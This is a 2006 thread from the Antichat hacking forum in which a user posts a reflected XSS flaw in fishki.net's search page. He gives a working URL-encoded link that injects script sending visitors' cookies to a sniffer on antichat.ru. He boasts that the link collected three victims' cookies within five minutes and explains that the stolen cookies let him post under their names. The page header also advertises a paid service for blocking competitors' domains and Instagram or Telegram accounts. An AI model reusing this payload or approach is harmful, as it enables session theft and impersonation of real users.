xss на www.fishki.net

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
xss на www.fishki.net

Опции темы

Поиск в этой теме

Опции просмотра

xss на www.fishki.net

25.03.2006, 17:17

podkashey

Познавший АНТИЧАТ

Регистрация: 18.06.2005

Сообщений: 1,004

С нами: 10997666

Репутация: 1320

xss на www.fishki.net

Пассивная XSS в поиске на популярном сайте _www.fishki.net:
если человек пройдет по ссылке _http://fishki.net/poisk.php?poisk=%27%3E%3Cscript%3Eimg+%3D+new+Imag e%28%29%3B+img.src+%3D+%22http%3A%2F%2Fantichat.ru %2Fcgi-bin%2Fs.jpg%3F%22%2Bdocument.cookie%3B%3C%2Fscript %3E
То оставит свои куки на сниффере. После подмены, можно писать комментарии под его ником. Больше никаких функций не будет по-моему. Поэтому ксс относительно бесполезная. Тема на форуме: "Глюк на фишки нет" с этой ссылкой пролежала 5 минут и принесла 3 куков.

𝕏 Twitter Reddit Telegram Копировать ссылку

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss в Nm	Gho_st	Уязвимости Mail-сервис	1	17.03.2006 21:10
XSS на whitep.net	•••™NO FEAR™•••	Уязвимости	3	07.03.2006 17:35
Xss на yandex.ru	Pridu_ROCK	Уязвимости	1	04.03.2006 01:08
XSS в Phorum<=5.0.14	tester2005	Уязвимости	22	17.03.2005 07:52
Возможно ли в phpBB(2.0.10) использовать xss и получить админские куки?	virgoz	Уязвимости CMS / форумов	2	02.01.2005 22:08

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules